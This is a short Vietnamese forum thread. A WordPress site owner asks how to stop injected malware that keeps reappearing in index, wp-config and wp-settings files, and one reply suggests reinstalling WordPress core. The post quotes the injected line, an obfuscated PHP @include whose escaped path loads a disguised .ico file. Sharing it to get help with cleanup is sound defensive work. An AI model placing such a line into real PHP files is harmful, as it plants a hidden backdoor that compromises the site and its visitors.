Hỏi về tự động bị chèn mã độc vào code

Các bác ở đây chắc hẳn ai cũng biết thể loại này:
/c6b4c/

@include “\057home\0573dsm\141rket\056com/\160ubli\143_htm\154/wp-\151nclu\144es/j\163/cro\160/.24\1431798\067.ico”;

/c6b4c/

decode ra thì nó là file .ico . Mình có tìm nhưng không thể tìm hết được nên nó cứ tự auto chèn vào index, wp-config, wp-setting … Do data lớn quá nên giờ làm lại import, export hơi căng nên không biết có anh em nào biết cách khắc phục triệt để hay biện pháp nào chặn tự động chèn vào code không ạ :frowning:

1 Like

Up lại core wordpress nhé b, b tìm lại thông tin có bài cũ hướng dẫn. Chúc thành công